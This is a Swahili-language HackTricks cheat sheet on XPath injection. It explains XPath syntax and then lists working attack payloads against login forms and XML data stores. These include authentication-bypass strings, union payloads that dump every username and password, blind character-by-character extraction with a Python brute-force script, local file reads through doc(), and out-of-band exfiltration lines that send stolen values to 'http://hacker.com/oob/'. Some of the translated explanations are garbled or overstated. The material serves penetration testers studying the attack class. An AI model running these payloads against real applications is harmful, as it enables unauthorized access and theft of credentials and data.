hacktricks/pentesting-web/xpath-injection.md

Uingizaji wa XPATH

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
• Pata bidhaa rasmi za PEASS & HackTricks
• Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!

Machapisho ya Udukuzi
Shiriki na yaliyomo yanayochimba katika msisimko na changamoto za udukuzi

Habari za Udukuzi za Wakati Halisi
Kaa up-to-date na ulimwengu wa udukuzi wenye kasi kupitia habari za wakati halisi na ufahamu

Matangazo Mapya
Baki mwelekezwa na tuzo mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!

Sintaksia Msingi

Mbinu ya mashambulizi inayojulikana kama Uingizaji wa XPath hutumiwa kuchukua faida ya programu ambazo hufanya matakwa ya XPath (Lugha ya Njia ya XML) kulingana na matokeo ya mtumiaji ili kuuliza au kutembea nyaraka za XML.

Nodes Zilizoelezwa

Maelezo hutumiwa kuchagua nodes mbalimbali katika hati ya XML. Maelezo haya na maelezo yake yameelezwa hapa chini:

• nodename: Nodes zote zenye jina "nodename" zinachaguliwa.
• /: Uchaguzi unafanywa kutoka kwa node ya msingi.
• //: Nodes zinazolingana na uchaguzi kutoka kwa node ya sasa zinachaguliwa, bila kujali mahali walipo katika hati.
• .: Node ya sasa imechaguliwa.
• ..: Wazazi wa node ya sasa wamechaguliwa.
• @: Vipengele vinachaguliwa.

Mifano ya XPath

Mifano ya maelezo ya njia na matokeo yake ni pamoja na:

• bookstore: Nodes zote zenye jina "bookstore" zinachaguliwa.
• /bookstore: Elementi ya msingi ya bookstore imechaguliwa. Inafahamika kuwa njia kamili kwa elementi ni kuanzia na mshale (/).
• bookstore/book: Elementi zote za kitabu ambazo ni watoto wa bookstore zinachaguliwa.
• //book: Elementi zote za kitabu katika hati zinachaguliwa, bila kujali mahali walipo.
• bookstore//book: Elementi zote za kitabu ambazo ni wazao wa elementi ya bookstore zinachaguliwa, bila kujali nafasi yao chini ya elementi ya bookstore.
• //@lang: Vipengele vyote vilivyo na jina la lang vinachaguliwa.

Matumizi ya Predicates

Predicates hutumiwa kurekebisha uchaguzi:

• /bookstore/book[1]: Elementi ya kitabu ya kwanza mtoto wa elementi ya bookstore imechaguliwa. Mbinu mbadala kwa IE toleo 5 hadi 9, ambayo inaorodhesha node ya kwanza kama [0], ni kuweka SelectionLanguage kuwa XPath kupitia JavaScript.
• /bookstore/book[last()]: Elementi ya kitabu ya mwisho mtoto wa elementi ya bookstore imechaguliwa.
• /bookstore/book[last()-1]: Elementi ya kitabu ya pili kutoka mwisho mtoto wa elementi ya bookstore imechaguliwa.
• /bookstore/book[position()<3]: Elementi mbili za kwanza za kitabu watoto wa elementi ya bookstore zimechaguliwa.
• //title[@lang]: Elementi zote za kichwa zenye sifa ya lang zimechaguliwa.
• //title[@lang='en']: Elementi zote za kichwa zenye thamani ya sifa ya "lang" ya "en" zimechaguliwa.
• /bookstore/book[price>35.00]: Elementi zote za kitabu za bookstore zenye bei kubwa kuliko 35.00 zimechaguliwa.
• /bookstore/book[price>35.00]/title: Elementi zote za kichwa za elementi za kitabu za bookstore zenye bei kubwa kuliko 35.00 zimechaguliwa.

Kushughulikia Nodes Zisizojulikana

Vidole vya mguu hutumiwa kwa kulinganisha nodes zisizojulikana:

• *: Inalinganisha kila node ya elementi.
• @*: Inalinganisha kila node ya sifa.
• node(): Inalinganisha kila node ya aina yoyote.

Mifano zaidi ni pamoja na:

• /bookstore/*: Inachagua nodes za elementi za watoto zote za elementi ya bookstore.
• //*: Inachagua elementi zote katika hati.
• //title[@*]: Inachagua elementi zote za kichwa zenye angalau sifa moja ya aina yoyote.

Mfano

<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
<name>pepe</name>
<password>peponcio</password>
<account>admin</account>
</user>
<user>
<name>mark</name>
<password>m12345</password>
<account>regular</account>
</user>
<user>
<name>fino</name>
<password>fino2</password>
<account>regular</account>
</user>
</data>

Pata ufikiaji wa habari

All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name

All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()


Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)

Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"

Kutambua na kuiba mpangilio

XPath Injection inaweza kutumika kutambua na kuiba mpangilio wa msingi wa data kutoka kwa tovuti. Kwa kufanya hivyo, mshambuliaji anaweza kupata ufikiaji wa data nyeti kama vile majina ya watumiaji, nywila, au maelezo mengine muhimu.

and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0

#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but jus the schema)
<root>
<a>
<b></b>
</a>
<c>
<d></d>
<e></e>
<f>
<h></h>
</f>
</c>
</root>

and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)

#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))

Kupuuza Uthibitisho

Mfano wa maswali:

string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';

Kupuuza OR katika jina la mtumiaji na nenosiri (thamani sawa kwa vyote viwili)

' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())

Select account
Select the account using the username and use one of the previous values in the password field

Kutumia null injection

Username: ' or 1]%00

Double OR katika Jina la mtumiaji au katika nenosiri (inakubalika na uga moja tu wenye kasoro)

MUHIMU: Tafadhali kumbuka kwamba "na" ni operesheni ya kwanza kufanywa.

Bypass with first match
(This requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())

Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2º account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())

Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())

Kunasa Nakala

Matokeo yanajumuisha maneno na mtumiaji anaweza kubadilisha thamani za kutafuta:

/user/username[contains(., '+VALUE+')]

') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users

Utekaji wa Kipofu

Pata urefu wa thamani na uitoa kwa kufanya mlinganisho:

' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"

substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value

Mfano wa Python

import requests, string

flag = ""
l = 0
alphabet = string.ascii_letters + string.digits + "{}_()"
for i in range(30):
r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))
if ("TRUE_COND" in r.text):
l = i
break
print("[+] Password length: " + str(l))
for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
for al in alphabet:
r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)
if ("TRUE_COND" in r.text):
flag += al
print("[+] Flag: " + flag)
break

Soma faili

XPath Injection inaweza kutumika kusoma faili za mfumo kwa kuchanganya maneno ya XPath na kufanya query zisizotarajiwa. Kwa mfano, kwa kuingiza ' or '1'='1 katika sehemu ya parameter ya XPath, inaweza kusababisha query kusoma faili zote kwenye mfumo.

(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127

Uchunguzi wa OOB

doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))

#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to

Zana ya Kiotomatiki

• xcat
• xxxpwn
• xxxpwn_smart
• xpath-blind-explorer
• XmlChor

Marejeo

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
• https://wiki.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)
• https://www.w3schools.com/xml/xpath_syntax.asp

Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za udhaifu!

Machapisho Kuhusu Udukuzi
Shiriki na maudhui yanayochimba kina kuhusu msisimko na changamoto za udukuzi

Taarifa za Udukuzi za Muda Halisi
Kaa sawa na ulimwengu wa udukuzi wenye kasi kupitia taarifa za muda halisi na ufahamu

Matangazo Mapya
Baki mwelekezi na matangazo mapya ya tuzo za udhaifu yanayoanzishwa na sasisho muhimu ya jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!

Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
• Pata bidhaa rasmi za PEASS & HackTricks
• Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.